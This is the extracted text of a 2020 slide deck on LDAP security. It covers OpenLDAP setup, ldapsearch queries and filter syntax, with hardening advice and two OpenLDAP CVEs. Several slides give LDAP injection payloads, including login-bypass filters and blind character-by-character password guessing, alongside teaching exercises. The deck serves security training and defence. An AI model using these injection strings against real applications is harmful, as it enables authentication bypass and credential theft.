LDAP SecurityEmre ÖVÜNÇ

info@emreovunc.com

Who am I ?

• Attack Developer – Picus Security • Security Researcher - Synack

• OSCE – OSCP – OSWP• LFCE – LFCS – ISO27001 LA

• https://github.com/EmreOvunc• https://twitter.com/EmreOvunc

Lightweight Directory Access Protocol

• TCP/IP

• Client – Server

• X.500 Protocol (1988-1993) | OSI

What is LDAP ?

• Protocol

• Database• Organizations• Units• People• Resources• Devices

• Authentication mechanism

Aim ?

• Access control• Privacy• Security• Authentication

• User management• Delegation• Rights

• Scaling

OpenLDAP

Open-source Free BSD-

License

OpenLDAP Components

• Slapd• Daemon• Receives connections

• Libraries & Utilities

• Client

LDAP Server

Ldap-utils Slapd Phpldapadmin Apache2 Bind9

LDAP Server

Ldap-utils Slapd Phpldapadmin Apache2 Bind9

LDAP Server Configuration

Search Parameters

ldapsearch –H ldap://172.16.155.128 –D ”cn=admin,dc=ovunc,dc=local” –W

-H: LDAP Uniform Resource Identifier(s)-D: bind DN-W: prompt for bind password

DC: domain componentDN: distinguished nameCN: common nameOU: organizational unit nameUID: user id

LDAP Anonymous Authentication

LDAP Simple Authentication

LDAP Configuration

LDAP Simple Authentication

LDAP Anonymous Authentication

LDAP Configuration

LDAP Anonymous Authentication

Nmap LDAP Enumeration

Nmap LDAP Enumeration

Nmap LDAP Bruteforcing

LDAP Filters

Operator Description Example

= Exactly match cn=admin

* Indicates zero or more character

ou=*

>= Greater than or equal uid >=

<= Less than or equal uid >=

=* One or more values cn=*

& And (&(filter)(filter(filter)

| Or (!(filter)(filter(filter)

! Not (!(filter))

LDAP Filters Example

• (&(objectClass=group)(cn=admin))

• (&(objectClass=posix)(cn=*team*))

• (&(objectClass=inetOrgPerson)(memberOf=cn=Admins,ou=redteam))

LDAP Web Application

<input type="text" name="user">Enter the username</input>

ldap_query = “(cn=" + $user + ")”

run(ldap_query)

???

LDAP Web Login Bypass

• (&(user=*)(password=*))

• (&(user=*))%00

• (&(user=*)(&))(password=*))

LDAP Injection Payloads

**)(&*))%00*()|%26'*()|&'*(|(mail=*))*(|(objectclass=*))*)(uid=*))(|(uid=**/*

LDAP Injection

(&(sn=admin)(password=*))(&(sn= admin)(password=a*))(&(sn= admin)(password=b*))

...(&(sn= admin)(password=m*))(&(sn= admin)(password=my*))

…(&(sn=admin)(password=myPassw0rd))

LDAP Injection Question ?

(&(objectClass=[class name])(ou=[unit name]))

(&(objectClass=posix)(ou=redteam))

LDAP Injection Answer

(&(objectClass=[class name])(ou=[unit name]))

(&(objectClass=*)(objectClass=*)(ou=*))

(&(objectClass=*)(objectClass=*) =*))(&(objectClass=foo)( ou=*))

(&(objectClass=*)(objectClass=*))(&(objectClass=people)(ou=redteam))

LDAP Injection Question ?

(&(deviceid=[id])(cn=[device name]))

(&(deviceid=34)(cn=nasbackup))

LDAP Injection Answer

(&(deviceid=[id])(cn=[device name]))

(&(deviceid=34)(ou=a*)(cn=nasbackup))(&(deviceid=34)(ou=b*)(cn=nasbackup))…(&(deviceid=34)(ou=re*)(cn=nasbackup))…(&(deviceid=34)(ou=redteam)(cn=nasbackup))

LDAP Hardening

Input validation (ldap queries)

Least privilege (users & devices)

AppArmor & SELinux configurations

LDAPs (secure connection)

Backup (encrypt & sign)

LDAP Server Hardening

Reject requests;No password,Null password,Unauthenticated,Anonymous users/sessions.

Do not use:SHA-1,LDAPv2,Weak passwords.

• OpenLDAP before 2.4.48

• Administrator delegation -> rootDN

• Slapd service• Authorization

• CVSS 4.9 (NVD)

CVE-2019-13057

• OpenLDAP 2.x before 2.4.48

• SASL authentication• Session Encryption

• ACL configuration• Successful authorization

(different user)

• CVSS 7.5 (NVD)

CVE-2019-13565

Lab

LDAP Lab Objects

LDAP Lab Objects

Organization: redteam

Organization Unit: people

Posix Group: nettim

Users: admin, bob

Demo Time

LDAP Tool J

• git clone https://github.com/EmreOvunc/eLdap-Ldap-Search-and-Filter.git

• cd eLdap-Ldap-Search-and-Filter • sudo pip3 install virtualenv• source myvenv/bin/activate • python3 manage.py runserver

LDAP Tool Vuln.

LDAP Tool Attack… not yet!

References

• https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

• https://ldap.com/ldap-filters/

• https://www.cvedetails.com/vulnerability-list/vendor_id-439/Openldap.html

LDAP SecurityEmre ÖVÜNÇ

info@emreovunc.com 16/04/2020